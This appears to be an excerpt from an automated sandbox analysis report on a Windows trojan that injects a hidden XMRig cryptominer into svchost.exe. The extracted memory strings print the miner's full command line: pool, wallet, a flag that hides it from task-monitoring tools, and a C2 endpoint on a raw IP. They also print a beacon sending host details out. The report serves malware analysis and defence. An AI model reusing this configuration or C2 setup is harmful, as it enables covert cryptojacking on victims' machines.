Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: X/0 --URL=POOL.SUPPORTXMR.COM:3333 --USER="4335MEZGWWSMBW161UQP6WAQYXZTRVXWSBPKZPXTXXAH4MTOXXBIERHGBAB8XHDZAEMKWWVNP49WWK5RIBJ37AK2AZKAEKR" --PASS="CW" --CPU-MAX-THREADS-HINT=30 --CINIT-WINRING="EGFVWBUZPBVZ.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --CINIT-IDLE-WAIT=10 --CINIT-IDLE-CPU=70 --CINIT-ID="WVRYIKMMHSKMHXZL" |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE |
Source: svchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEDLL |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE9 |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:3333--USER=4335MEZGWWSMBW161UQP6WAQYXZTRVXWSBPKZPXTXXAH4MTOXXBIERHGBAB8XHDZAEMKWWVNP49WWK5RIBJ37AK2AZKAEKR--PASS=CW--CPU-MAX-THREADS-HINT=30--CINIT-WINRING=EGFVWBUZPBVZ.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHP--CINIT-VERSION=3.4.1--CINIT-IDLE-WAIT=10--CINIT-IDLE-CPU=70--CINIT-ID=WVRYIKMMHSKMHXZL |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXELTQ.EX |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 5X/0 --URL=POOL.SUPPORTXMR.COM:3333 --USER="4335MEZGWWSMBW161UQP6WAQYXZTRVXWSBPKZPXTXXAH4MTOXXBIERHGBAB8XHDZAEMKWWVNP49WWK5RIBJ37AK2AZKAEKR" --PASS="CW" --CPU-MAX-THREADS-HINT=30 --CINIT-WINRING="EGFVWBUZPBVZ.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --CINIT-IDLE-WAIT=10 --CINIT-IDLE-CPU=70 --CINIT-ID="WVRYIKMMHSKMHXZL" |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1729543619.000001693E06B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE |
Source: svchost.exe, 0000001B.00000003.1729543619.000001693E06B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHPWVRYIKMMHSKMHXZL |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E05E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: svchost.exe, 0000001B.00000002.2979931323.000001693E06A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {"id":"wvryikmmhskmhxzl","computername":"051829","username":"SYSTEM","gpu":"BZUOM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","runtime":120,"type":"xmrig","pool":"pool.supportxmr.com","port":3333,"algo":"rx/0","worker":"","password":"cw","user":"4335MezGWwSMbW161uqp6waQyxztRVXwSBpkzpXTXxah4mToXxBiErhgBAB8XhdzAeMKwWvnP49wWK5riBJ37AK2AZKAEKR","hashrate":389.8165326736755,"status":2}MSAFD RfComm [Bluetooth]Hyper-V RAWMSAFD L2CAP [Bluetooth]RSVP TCPv6 Service Provider |
Source: svchost.exe, 0000001B.00000002.2979820922.000001693E013000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@ |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Code function: 0_2_00007FF64FE01160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, | 0_2_00007FF64FE01160 |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Code function: 17_2_00007FF6D96D1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, | 17_2_00007FF6D96D1160 |
Source: C:\Windows\System32\conhost.exe | Code function: 23_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, | 23_2_0000000140001160 |